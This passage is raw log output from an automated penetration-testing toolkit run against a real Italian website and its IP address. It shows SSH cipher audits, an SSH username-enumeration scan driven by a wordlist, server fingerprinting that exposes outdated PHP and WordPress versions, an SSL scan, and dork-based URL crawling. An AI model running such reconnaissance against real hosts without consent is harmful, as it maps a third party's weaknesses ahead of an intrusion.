  1524. `- [warn] using encrypt-and-MAC mode
  1525. `- [info] available since OpenSSH 2.5.0
  1526. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1527. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1528. `- [warn] using encrypt-and-MAC mode
  1529. `- [info] available since OpenSSH 2.1.0
  1530. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1531. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1532. `- [warn] using encrypt-and-MAC mode
  1533. `- [warn] using weak hashing algorithm
  1534. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  1535. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1536. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1537. `- [warn] using encrypt-and-MAC mode
  1538. `- [warn] using weak hashing algorithm
  1539. `- [info] available since OpenSSH 2.5.0
  1540.  
  1541. # algorithm recommendations (for OpenSSH 6.0)
  1542. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  1543. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  1544. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  1545. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
  1546. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
  1547. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
  1548. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
  1549. (rec) -ssh-dss -- key algorithm to remove
  1550. (rec) -arcfour -- enc algorithm to remove
  1551. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  1552. (rec) -blowfish-cbc -- enc algorithm to remove
  1553. (rec) -3des-cbc -- enc algorithm to remove
  1554. (rec) -aes256-cbc -- enc algorithm to remove
  1555. (rec) -arcfour256 -- enc algorithm to remove
  1556. (rec) -cast128-cbc -- enc algorithm to remove
  1557. (rec) -aes192-cbc -- enc algorithm to remove
  1558. (rec) -arcfour128 -- enc algorithm to remove
  1559. (rec) -aes128-cbc -- enc algorithm to remove
  1560. (rec) -hmac-md5-96 -- mac algorithm to remove
  1561. (rec) -hmac-sha2-256-96 -- mac algorithm to remove
  1562. (rec) -hmac-ripemd160 -- mac algorithm to remove
  1563. (rec) -hmac-sha1-96 -- mac algorithm to remove
  1564. (rec) -umac-64@openssh.com -- mac algorithm to remove
  1565. (rec) -hmac-md5 -- mac algorithm to remove
  1566. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  1567. (rec) -hmac-sha1 -- mac algorithm to remove
  1568. (rec) -hmac-sha2-512-96 -- mac algorithm to remove
  1569. ######################################################################################################################################
  1570. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  1571. RHOSTS => www.granloggiafemminile.it
  1572. RHOST => www.granloggiafemminile.it
  1573. [*] 77.238.18.215:22 - SSH - Using malformed packet technique
  1574. [*] 77.238.18.215:22 - SSH - Starting scan
  1575. [-] 77.238.18.215:22 - SSH - User 'admin' not found
  1576. [-] 77.238.18.215:22 - SSH - User 'administrator' not found
  1577. [-] 77.238.18.215:22 - SSH - User 'anonymous' not found
  1578. [-] 77.238.18.215:22 - SSH - User 'backup' not found
  1579. [-] 77.238.18.215:22 - SSH - User 'bee' not found
  1580. [-] 77.238.18.215:22 - SSH - User 'ftp' not found
  1581. [-] 77.238.18.215:22 - SSH - User 'guest' not found
  1582. [-] 77.238.18.215:22 - SSH - User 'GUEST' not found
  1583. [-] 77.238.18.215:22 - SSH - User 'info' not found
  1584. [-] 77.238.18.215:22 - SSH - User 'mail' not found
  1585. [-] 77.238.18.215:22 - SSH - User 'mailadmin' not found
  1586. [-] 77.238.18.215:22 - SSH - User 'msfadmin' not found
  1587. [-] 77.238.18.215:22 - SSH - User 'mysql' not found
  1588. [-] 77.238.18.215:22 - SSH - User 'nobody' not found
  1589. [-] 77.238.18.215:22 - SSH - User 'oracle' not found
  1590. [-] 77.238.18.215:22 - SSH - User 'owaspbwa' not found
  1591. [-] 77.238.18.215:22 - SSH - User 'postfix' not found
  1592. [-] 77.238.18.215:22 - SSH - User 'postgres' not found
  1593. [-] 77.238.18.215:22 - SSH - User 'private' not found
  1594. [-] 77.238.18.215:22 - SSH - User 'proftpd' not found
  1595. [-] 77.238.18.215:22 - SSH - User 'public' not found
  1596. [-] 77.238.18.215:22 - SSH - User 'root' not found
  1597. [-] 77.238.18.215:22 - SSH - User 'superadmin' not found
  1598. [-] 77.238.18.215:22 - SSH - User 'support' not found
  1599. [-] 77.238.18.215:22 - SSH - User 'sys' not found
  1600. [-] 77.238.18.215:22 - SSH - User 'system' not found
  1601. [-] 77.238.18.215:22 - SSH - User 'systemadmin' not found
  1602. [-] 77.238.18.215:22 - SSH - User 'systemadministrator' not found
  1603. [-] 77.238.18.215:22 - SSH - User 'test' not found
  1604. [-] 77.238.18.215:22 - SSH - User 'tomcat' not found
  1605. [-] 77.238.18.215:22 - SSH - User 'user' not found
  1606. [-] 77.238.18.215:22 - SSH - User 'webmaster' not found
  1607. [-] 77.238.18.215:22 - SSH - User 'www-data' not found
  1608. [-] 77.238.18.215:22 - SSH - User 'Fortimanager_Access' not found
  1609. [*] Scanned 1 of 1 hosts (100% complete)
  1610. [*] Auxiliary module execution completed
  1611. ######################################################################################################################################
  1612. https://www.granloggiafemminile.it [301 Moved Permanently] Country[ITALY][IT], HTTPServer[nginx/1.6.2], IP[77.238.18.215], PHP[5.4.45-0+deb7u9], RedirectLocation[https://www.alladv.it/], X-Powered-By[PHP/5.4.45-0+deb7u9], nginx[1.6.2], x-pingback[https://www.alladv.it/xmlrpc.php]
  1613. https://www.alladv.it/ [200 OK] Country[ITALY][IT], Email[alladv@alldv.it,alladv@alldv.it ], Google-Analytics[Universal][UA-46338052-1], HTTPServer[nginx/1.6.2], IP[77.238.18.215], JQuery[1.11.3], MetaGenerator[WordPress 4.4.1], Modernizr[transitions], PHP[5.4.45-0+deb7u9], Script[application/ld+json,text/javascript], Title[All Advertising, facciamo di tutto per comunicare][Title element contains newline(s)!], UncommonHeaders[link], W3-Total-Cache, WordPress[4.4.1], X-Powered-By[PHP/5.4.45-0+deb7u9], nginx[1.6.2], x-pingback[https://www.alladv.it/xmlrpc.php]
  1614. ######################################################################################################################################
  1615. Version: 1.11.13-static
  1616. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1617.  
  1618. Connected to 77.238.18.215
  1619.  
  1620. Testing SSL server www.granloggiafemminile.it on port 443 using SNI name www.granloggiafemminile.it
  1621.  
  1622. TLS Fallback SCSV:
  1623. Server supports TLS Fallback SCSV
  1624.  
  1625. TLS renegotiation:
  1626. Secure session renegotiation supported
  1627.  
  1628. TLS Compression:
  1629. Compression disabled
  1630.  
  1631. Heartbleed:
  1632. TLS 1.2 not vulnerable to heartbleed
  1633. TLS 1.1 not vulnerable to heartbleed
  1634. TLS 1.0 not vulnerable to heartbleed
  1635.  
  1636. Supported Server Cipher(s):
  1637. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1638. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1639. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1640. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
  1641. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
  1642. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  1643. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  1644. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  1645. Accepted TLSv1.2 256 bits AES256-SHA256
  1646. Accepted TLSv1.2 256 bits AES256-SHA
  1647. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  1648. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1649. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1650. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1651. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
  1652. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
  1653. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  1654. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  1655. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  1656. Accepted TLSv1.2 128 bits AES128-SHA256
  1657. Accepted TLSv1.2 128 bits AES128-SHA
  1658. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  1659. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1660. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  1661. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  1662. Accepted TLSv1.1 256 bits AES256-SHA
  1663. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  1664. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1665. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  1666. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  1667. Accepted TLSv1.1 128 bits AES128-SHA
  1668. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  1669. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1670. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  1671. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  1672. Accepted TLSv1.0 256 bits AES256-SHA
  1673. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  1674. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1675. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  1676. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  1677. Accepted TLSv1.0 128 bits AES128-SHA
  1678. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  1679.  
  1680. SSL Certificate:
  1681. Signature Algorithm: sha256WithRSAEncryption
  1682. RSA Key Strength: 2048
  1683.  
  1684. Subject: www.alladv.it
  1685. Altnames: DNS:www.alladv.it, DNS:alladv.it
  1686. Issuer: RapidSSL RSA CA 2018
  1687.  
  1688. Not valid before: Feb 11 00:00:00 2019 GMT
  1689. Not valid after: Mar 12 12:00:00 2020 GMT
  1690. ######################################################################################################################################
  1691. ------------------------------------------------------------------------------------------------------------------------
  1692.  
  1693. [ ! ] Starting SCANNER INURLBR 2.1 at [25-09-2019 11:29:35]
  1694. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1695. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1696. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1697.  
  1698. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.granloggiafemminile.it/output/inurlbr-www.granloggiafemminile.it ]
  1699. [ INFO ][ DORK ]::[ site:www.granloggiafemminile.it ]
  1700. [ INFO ][ SEARCHING ]:: {
  1701. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.dk ]
  1702.  
  1703. [ INFO ][ SEARCHING ]::
  1704. -[:::]
  1705. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1706.  
  1707. [ INFO ][ SEARCHING ]::
  1708. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1709. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sa ID: 005911257635119896548:iiolgmwf2se ]
  1710.  
  1711. [ INFO ][ SEARCHING ]::
  1712. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1713.  
  1714. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  1715.  
  1716.  
  1717. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1718. |_[ + ] [ 0 / 100 ]-[11:29:50] [ - ]
  1719. |_[ + ] Target:: [ http://www.granloggiafemminile.it/ ]
  1720. |_[ + ] Exploit::
  1721. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1722. |_[ + ] More details:: / - / , ISP:
  1723. |_[ + ] Found:: UNIDENTIFIED
  1724.  
  1725. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1726. |_[ + ] [ 1 / 100 ]-[11:29:51] [ - ]
  1727. |_[ + ] Target:: [ http://www.granloggiafemminile.it/glossario ]
  1728. |_[ + ] Exploit::
  1729. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1730. |_[ + ] More details:: / - / , ISP:
  1731. |_[ + ] Found:: UNIDENTIFIED
  1732.  
  1733. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1734. |_[ + ] [ 2 / 100 ]-[11:29:51] [ - ]
  1735. |_[ + ] Target:: [ http://www.granloggiafemminile.it/contatti ]
  1736. |_[ + ] Exploit::
  1737. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1738. |_[ + ] More details:: / - / , ISP:
  1739. |_[ + ] Found:: UNIDENTIFIED
  1740.  
  1741. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1742. |_[ + ] [ 3 / 100 ]-[11:29:52] [ - ]
  1743. |_[ + ] Target:: [ http://www.granloggiafemminile.it/storia ]
  1744. |_[ + ] Exploit::
  1745. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1746. |_[ + ] More details:: / - / , ISP:
  1747. |_[ + ] Found:: UNIDENTIFIED
  1748.  
  1749. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1750. |_[ + ] [ 4 / 100 ]-[11:29:53] [ - ]
  1751. |_[ + ] Target:: [ http://www.granloggiafemminile.it/storia/allocuzioni ]
  1752. |_[ + ] Exploit::
  1753. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1754. |_[ + ] More details:: / - / , ISP:
  1755. |_[ + ] Found:: UNIDENTIFIED
  1756.  
  1757. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1758. |_[ + ] [ 5 / 100 ]-[11:29:53] [ - ]
  1759. |_[ + ] Target:: [ http://www.granloggiafemminile.it/readme.html ]
  1760. |_[ + ] Exploit::
  1761. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 , IP:77.238.18.215:80
  1762. |_[ + ] More details:: / - / , ISP:
  1763. |_[ + ] Found:: UNIDENTIFIED
  1764.  
  1765. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1766. |_[ + ] [ 6 / 100 ]-[11:29:54] [ - ]
  1767. |_[ + ] Target:: [ http://www.granloggiafemminile.it/category/allocuzioni ]
  1768. |_[ + ] Exploit::
  1769. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1770. |_[ + ] More details:: / - / , ISP:
  1771. |_[ + ] Found:: UNIDENTIFIED
  1772.  
  1773. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1774. |_[ + ] [ 7 / 100 ]-[11:29:55] [ - ]
  1775. |_[ + ] Target:: [ http://www.granloggiafemminile.it/author/alladv ]
  1776. |_[ + ] Exploit::
  1777. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1778. |_[ + ] More details:: / - / , ISP:
  1779. |_[ + ] Found:: UNIDENTIFIED
  1780.  
  1781. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1782. |_[ + ] [ 8 / 100 ]-[11:29:56] [ - ]
  1783. |_[ + ] Target:: [ http://www.granloggiafemminile.it/category/glossario ]
  1784. |_[ + ] Exploit::
  1785. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1786. |_[ + ] More details:: / - / , ISP:
  1787. |_[ + ] Found:: UNIDENTIFIED
  1788.  
  1789. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1790. |_[ + ] [ 9 / 100 ]-[11:29:57] [ - ]
  1791. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/donne ]
  1792. |_[ + ] Exploit::
  1793. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1794. |_[ + ] More details:: / - / , ISP:
  1795. |_[ + ] Found:: UNIDENTIFIED
  1796.  
  1797. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1798. |_[ + ] [ 10 / 100 ]-[11:29:58] [ - ]
  1799. |_[ + ] Target:: [ http://www.granloggiafemminile.it/author/sviluppo ]
  1800. |_[ + ] Exploit::
  1801. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1802. |_[ + ] More details:: / - / , ISP:
  1803. |_[ + ] Found:: UNIDENTIFIED
  1804.  
  1805. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1806. |_[ + ] [ 11 / 100 ]-[11:29:59] [ - ]
  1807. |_[ + ] Target:: [ http://www.granloggiafemminile.it/category/notizie ]
  1808. |_[ + ] Exploit::
  1809. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1810. |_[ + ] More details:: / - / , ISP:
  1811. |_[ + ] Found:: UNIDENTIFIED
  1812.  
  1813. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1814. |_[ + ] [ 12 / 100 ]-[11:30:00] [ - ]
  1815. |_[ + ] Target:: [ http://www.granloggiafemminile.it/category/uncategorized ]
  1816. |_[ + ] Exploit::
  1817. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1818. |_[ + ] More details:: / - / , ISP:
  1819. |_[ + ] Found:: UNIDENTIFIED
  1820.  
  1821. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1822. |_[ + ] [ 13 / 100 ]-[11:30:02] [ - ]
  1823. |_[ + ] Target:: [ http://www.granloggiafemminile.it/portfolio_post/portfolio4 ]
  1824. |_[ + ] Exploit::
  1825. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1826. |_[ + ] More details:: / - / , ISP:
  1827. |_[ + ] Found:: UNIDENTIFIED
  1828.  
  1829. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1830. |_[ + ] [ 14 / 100 ]-[11:30:03] [ - ]
  1831. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/fratellanza ]
  1832. |_[ + ] Exploit::
  1833. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1834. |_[ + ] More details:: / - / , ISP:
  1835. |_[ + ] Found:: UNIDENTIFIED
  1836.  
  1837. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1838. |_[ + ] [ 15 / 100 ]-[11:30:03] [ - ]
  1839. |_[ + ] Target:: [ http://www.granloggiafemminile.it/glossario/tempio ]
  1840. |_[ + ] Exploit::
  1841. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1842. |_[ + ] More details:: / - / , ISP:
  1843. |_[ + ] Found:: UNIDENTIFIED
  1844.  
  1845. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1846. |_[ + ] [ 16 / 100 ]-[11:30:05] [ - ]
  1847. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/femminile ]
  1848. |_[ + ] Exploit::
  1849. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1850. |_[ + ] More details:: / - / , ISP:
  1851. |_[ + ] Found:: UNIDENTIFIED
  1852.  
  1853. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1854. |_[ + ] [ 17 / 100 ]-[11:30:06] [ - ]
  1855. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/massoneria ]
  1856. |_[ + ] Exploit::
  1857. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1858. |_[ + ] More details:: / - / , ISP:
  1859. |_[ + ] Found:: UNIDENTIFIED
  1860.  
  1861. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1862. |_[ + ] [ 18 / 100 ]-[11:30:07] [ - ]
  1863. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/conferenza ]
  1864. |_[ + ] Exploit::
  1865. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1866. |_[ + ] More details:: / - / , ISP:
  1867. |_[ + ] Found:: UNIDENTIFIED
  1868.  
  1869. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1870. |_[ + ] [ 19 / 100 ]-[11:30:10] [ - ]
  1871. |_[ + ] Target:: [ http://www.granloggiafemminile.it/glossario/loggia ]
  1872. |_[ + ] Exploit::
  1873. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1874. |_[ + ] More details:: / - / , ISP:
  1875. |_[ + ] Found:: UNIDENTIFIED
  1876.  
  1877. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1878. |_[ + ] [ 20 / 100 ]-[11:30:14] [ - ]
  1879. |_[ + ] Target:: [ http://www.granloggiafemminile.it/glossario/silenzio ]
  1880. |_[ + ] Exploit::
  1881. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1882. |_[ + ] More details:: / - / , ISP:
  1883. |_[ + ] Found:: UNIDENTIFIED
  1884.  
  1885. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1886. |_[ + ] [ 21 / 100 ]-[11:30:18] [ - ]
  1887. |_[ + ] Target:: [ http://www.granloggiafemminile.it/glossario/archetipo ]
  1888. |_[ + ] Exploit::
  1889. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1890. |_[ + ] More details:: / - / , ISP:
  1891. |_[ + ] Found:: UNIDENTIFIED
  1892.  
  1893. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1894. |_[ + ] [ 22 / 100 ]-[11:30:21] [ - ]
  1895. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/iniziazione ]
  1896. |_[ + ] Exploit::
  1897. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1898. |_[ + ] More details:: / - / , ISP:
  1899. |_[ + ] Found:: UNIDENTIFIED
  1900.  
  1901. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1902. |_[ + ] [ 23 / 100 ]-[11:30:26] [ - ]
  1903. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/convento ]
  1904. |_[ + ] Exploit::
  1905. |_[ + ] Information Server:: , , IP::0
  1906. |_[ + ] More details::
  1907. |_[ + ] Found:: UNIDENTIFIED
  1908.  
  1909. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1910. |_[ + ] [ 24 / 100 ]-[11:30:29] [ - ]
  1911. |_[ + ] Target:: [ http://www.granloggiafemminile.it/uncategorized/1923 ]
  1912. |_[ + ] Exploit::
  1913. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1914. |_[ + ] More details:: / - / , ISP:
  1915. |_[ + ] Found:: UNIDENTIFIED
  1916.  
  1917. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1918. |_[ + ] [ 25 / 100 ]-[11:30:33] [ - ]
  1919. |_[ + ] Target:: [ http://www.granloggiafemminile.it/evento/1143 ]
  1920. |_[ + ] Exploit::
  1921. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1922. |_[ + ] More details:: / - / , ISP:
  1923. |_[ + ] Found:: UNIDENTIFIED
  1924.  
  1925. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1926. |_[ + ] [ 26 / 100 ]-[11:30:36] [ - ]
  1927. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/rituale ]
  1928. |_[ + ] Exploit::
  1929. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1930. |_[ + ] More details:: / - / , ISP:
  1931. |_[ + ] Found:: UNIDENTIFIED
  1932.  
  1933. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1934. |_[ + ] [ 27 / 100 ]-[11:30:41] [ - ]
  1935. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/silenzio ]
  1936. |_[ + ] Exploit::
  1937. |_[ + ] Information Server:: , , IP:77.238.18.215:80
  1938. |_[ + ] More details:: / - / , ISP:
  1939. |_[ + ] Found:: UNIDENTIFIED
  1940.  
  1941. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1942. |_[ + ] [ 28 / 100 ]-[11:30:46] [ - ]
  1943. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/ferrara ]
  1944. |_[ + ] Exploit::
  1945. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1946. |_[ + ] More details:: / - / , ISP:
  1947. |_[ + ] Found:: UNIDENTIFIED
  1948.  
  1949. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1950. |_[ + ] [ 29 / 100 ]-[11:30:51] [ - ]
  1951. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/esoterismo ]
  1952. |_[ + ] Exploit::
  1953. |_[ + ] Information Server:: , , IP::0
  1954. |_[ + ] More details::
  1955. |_[ + ] Found:: UNIDENTIFIED
  1956.  
  1957. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1958. |_[ + ] [ 30 / 100 ]-[11:30:56] [ - ]
  1959. |_[ + ] Target:: [ http://www.granloggiafemminile.it/uncategorized/capitazione ]
  1960. |_[ + ] Exploit::
  1961. |_[ + ] Information Server:: , , IP::0
  1962. |_[ + ] More details::
  1963. |_[ + ] Found:: UNIDENTIFIED
  1964.  
  1965. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1966. |_[ + ] [ 31 / 100 ]-[11:30:58] [ - ]
  1967. |_[ + ] Target:: [ http://www.granloggiafemminile.it/le-logge ]
  1968. |_[ + ] Exploit::
  1969. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1970. |_[ + ] More details:: / - / , ISP:
  1971. |_[ + ] Found:: UNIDENTIFIED
  1972.  
  1973. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1974. |_[ + ] [ 32 / 100 ]-[11:31:02] [ - ]
  1975. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/catania ]
  1976. |_[ + ] Exploit::
  1977. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  1978. |_[ + ] More details:: / - / , ISP:
  1979. |_[ + ] Found:: UNIDENTIFIED
  1980.  
  1981. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1982. |_[ + ] [ 33 / 100 ]-[11:31:04] [ - ]
  1983. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/acacia ]
  1984. |_[ + ] Exploit::
